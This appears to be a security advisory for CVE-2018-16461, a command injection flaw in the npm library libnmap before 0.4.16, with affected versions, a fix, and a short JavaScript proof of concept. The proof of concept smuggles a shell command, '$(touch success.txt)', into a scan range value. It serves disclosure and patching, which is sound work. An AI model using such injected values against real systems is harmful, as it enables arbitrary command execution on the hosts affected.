NetSight
critical9.8

CVE-2018-16461

Command Injection in libnmap

Impact

Versions of `libnmap` before 0.4.16 are vulnerable to command injection. Proof of concept ```js const nmap = require('libnmap'); const opts = { range: [ 'scanme.nmap.org', "x.x.$(touch success.txt)" ] }; nmap.scan(opts, function(err, report) { if (err) throw new Error(err); for (let item in report) { console.log(JSON.stringify(report[item])); } }); ``` ## Recommendation Update to version 0.4.16 or later

Affected packages

EcosystemPackageAffectedFixed in
npmlibnmap< 0.4.160.4.16

Affected products

VendorProductAffected versions
Libnmap ProjectLibnmap
before 0.4.16

Weakness classification

References